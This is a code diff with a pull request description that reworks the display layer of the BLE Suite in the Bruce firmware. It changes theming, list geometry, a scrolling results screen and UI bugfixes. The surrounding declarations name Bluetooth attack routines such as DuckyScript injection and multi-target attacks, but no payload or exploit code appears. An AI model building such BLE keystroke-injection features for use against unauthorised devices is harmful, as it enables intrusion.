+    const uint16_t sev = bleSeverity(bgColor);
+    const int barW = 3;
+    const int textX = g.listL + barW + 4;
+    const int textW = g.listW - barW - 4;
 
-    tft.setTextColor(textColor, bgColor);
-    int yPos = 60;
-    int lineHeight = 20;
-    int maxLines = 8;
+    // Wrap everything up front so the screen can scroll instead of silently
+    // dropping whatever did not fit.
+    std::vector<String> rows;
+    for (size_t i = 0; i < lines.size(); i++) bleWrapInto(lines[i], textW, rows);
 
-    for (int i = 0; i < std::min((int)lines.size(), maxLines); i++) {
-        if (yPos + lineHeight > tftHeight - 45) break;
+    const int perPage = g.rows;
+    int off = 0, lastOff = -1;
 
-        String displayLine = lines[i];
-        int maxWidth = tftWidth - 40;
-        int lineY = yPos;
-        int start = 0;
-        int len = displayLine.length();
+    drawMainBorderWithTitle(title);
+    tft.fillRect(g.listL, g.top - 2, barW, perPage * g.rowH, sev);
 
-        while (start < len) {
-            int end = start;
-            int lastSpace = -1;
-
-            while (end < len && (end - start) * 6 < maxWidth) {
-                if (displayLine.charAt(end) == ' ') lastSpace = end;
-                end++;
+    for (;;) {
+        if (off != lastOff) {
+            lastOff = off;
+            tft.setTextSize(FP);
+            for (int i = 0; i < perPage; i++) {
+                int y = g.top + i * g.rowH;
+                tft.fillRect(textX, y - 2, textW, g.rowH, bruceConfig.bgColor);
+                size_t idx = (size_t)(off + i);
+                if (idx >= rows.size()) continue;
+                tft.setTextColor(bruceConfig.priColor, bruceConfig.bgColor);
+                tft.drawString(rows[idx], textX, y, 1);
             }
 
-            if (end == len || lastSpace == -1) {
-                tft.setCursor(20, lineY);
-                tft.print(displayLine.substring(start, end));
-                start = end;
-            } else {
-                tft.setCursor(20, lineY);
-                tft.print(displayLine.substring(start, lastSpace));
-                start = lastSpace + 1;
+            tft.fillRect(g.listL, g.footY, g.listW, 8 * FP, bruceConfig.bgColor);
+            bool more = (int)rows.size() > perPage;
+            tft.setTextColor(bleDim(), bruceConfig.bgColor);
+            tft.drawString(more ? "PREV/NEXT scroll  ESC back" : "SEL / ESC back", g.listL, g.footY, 1);
+            if (more) {
+                int last = std::min((int)rows.size(), off + perPage);
+                String pos = String(off + 1) + "-" + String(last) + "/" + String((int)rows.size());
+                tft.setTextColor(bruceConfig.priColor, bruceConfig.bgColor);
+                tft.drawRightString(pos, g.listL + g.listW, g.footY, 1);
             }
-            lineY += lineHeight;
-            if (lineY > tftHeight - 45) break;
         }
-        yPos = lineY;
-    }
 
-    tft.setTextColor(TFT_BLACK, bgColor);
-    tft.setCursor(20, tftHeight - 35);
-    tft.print("Press any key to continue...");
-
-    while (true) {
-        if (check(EscPress) || check(SelPress) || check(PrevPress) || check(NextPress)) {
-            delay(200);
-            return;
+        if (check(EscPress) || check(SelPress)) return;
+        else if (check(PrevPress) || check(UpPress)) off = std::max(0, off - perPage);
+        else if (check(NextPress) || check(DownPress)) {
+            if (off + perPage < (int)rows.size()) off += perPage;
         }
-        delay(50);
+        vTaskDelay(20 / portTICK_PERIOD_MS);
     }
 }
 #endif

--- a/src/modules/ble/BLE_Suite.h
+++ b/src/modules/ble/BLE_Suite.h
@@ -576,7 +576,7 @@ void runAdvancedDuckyInjection(NimBLEAddress target);
 void runHIDVulnerabilityTest(NimBLEAddress target);
 void runMultiTargetAttack();
 void executeAudioTest(int testIndex, NimBLEAddress target);
-void showAttackProgress(const char *message, uint16_t color = TFT_WHITE);
+void showAttackProgress(const char *message, uint16_t color = bruceConfig.priColor);
 void showAttackResult(bool success, const char *message = nullptr);
 bool confirmAttack(const char *targetName);
 String selectTargetFromScan(const char *title);


### PR DESCRIPTION
#### Proposed Changes ####

The suite drew every screen itself, on a pixel grid that assumed a tall
panel. Rows sat at a fixed y = 60 with 25 or 30px pitch under a two-line
footer, so on a 135px Cardputer the menus fitted two rows and the device
list exactly one, which is why a long list left no sense of place. Colours
were roughly 279 fixed TFT_ constants, so nothing followed the theme.

Add a small set of shared helpers and move every list onto them:

  - geometry derived from tftWidth/tftHeight; a Cardputer goes from 1-2
    visible rows to 5
  - the standard Bruce frame through drawMainBorderWithTitle, so the screens
    finally carry the border, title and status bar
  - colours from the theme via getColorVariation instead of fixed white,
    green and cyan
  - truncation measured with textWidth rather than counted in characters
  - only the list body repaints between key presses, so moving the cursor no
    longer flashes the whole screen
  - navigation without the blocking delay(150) that made input feel stuck

Device rows carry what the list was missing: an ordinal to refer to a device
by, the last two MAC octets to tell apart identical names, and a four-step
signal meter in place of a raw RSSI number. Capability tags reserve their
width before the name is measured, so a long name can no longer push the
vulnerability markers off screen.

Submenus show the selected target on the hint line, and every list carries a
position readout.

Feedback screens stop flooding the panel with solid yellow, green and red
and use Bruce's own displayWarning / displayError / displaySuccess stripes.
The two second splash carrying its own hardcoded version number is gone.

#### Types of Changes ####

UI rework, plus three bugfixes:

  - showAdaptiveMessage drew its hint with TFT_BLACK on the theme background,
    so "Press any key to continue..." was invisible on every dark theme and
    the screen looked hung. Pre-existing.
  - showDeviceInfoScreen silently dropped any line past the bottom of the
    panel. It now wraps everything up front and pages with PREV/NEXT.
  - the multi-target picker advertised "NEXT: Confirm" but no key confirmed,
    so ESC - which clears the selection - was the only way out and the
    success path was unreachable. A trailing Confirm row completes it.

#### Verification ####

Flash and open BLE Suite. Expect five rows per screen on a Cardputer instead
of one or two, a themed border with title and battery, and an "n/total"
readout at the foot of every list. Device rows should show number, name, MAC
tail, tags and signal bars, and changing the theme colour should recolour the
whole suite.

Run a Quick Vulnerability Scan against any target and confirm the TEST
RESULTS screen shows its text with a coloured severity bar down the left
edge: green for safe, orange for vulnerable, red for failure.

The DuckyScript picker and the multi-select flow deserve a real run: their
payload strings and target lists are unchanged but the selection paths were
rewritten.

#### Testing ####

No unit test harness exists for this layer. Compiled clean for
m5stack-cardputer.

Partially exercised on hardware: an earlier revision of this branch rendered
the results screens blank, because showDeviceInfoScreen kept using the
caller's textColor after losing the solid background it was meant to contrast
with - six call sites pass TFT_BLACK, which is invisible on a black theme.
Body text now always uses the theme foreground and the caller's colour only
picks the severity marker, which is why that class of failure cannot recur.
The attack paths themselves were not exercised; this change only touches
presentation.

#### Linked Issues ####

None. Independent of the spectrum PRs: it shares no file with them and uses
only core APIs already present in dev, so it can merge in any order.

#### User-Facing Change ####
```release-note
BLE Suite now uses the standard Bruce frame, follows the active theme and sizes its lists to the display, showing five rows on a Cardputer instead of one. Device entries gained an index, MAC tail and signal bars, and result screens scroll instead of truncating. Fixed an invisible "press any key" hint on dark themes and a multi-target picker that could not confirm a selection.
```

#### Further Comments ####

Around 165 fixed colours remain, in sniffer and attack-result screens not
covered here. No scrollbar was added: Bruce has no such idiom anywhere, so it
belongs in the core rather than in this module.

before/after
<img width="562" height="308" alt="IMG_8410" src="https://github.com/user-attachments/assets/f0974144-6d24-4639-b0df-3ed936758e33" />
<img width="536" height="322" alt="IMG_8409" src="https://github.com/user-attachments/assets/1d963bf0-7992-4e69-ad97-aa80d32612eb" />

before/after (target selection)
<img width="516" height="334" alt="IMG_8411" src="https://github.com/user-attachments/assets/0240356a-5d47-4855-b72a-ad3646dd1cfe" />
<img width="488" height="352" alt="IMG_8407" src="https://github.com/user-attachments/assets/5071985b-ec44-4527-991d-8ba0a65e4256" />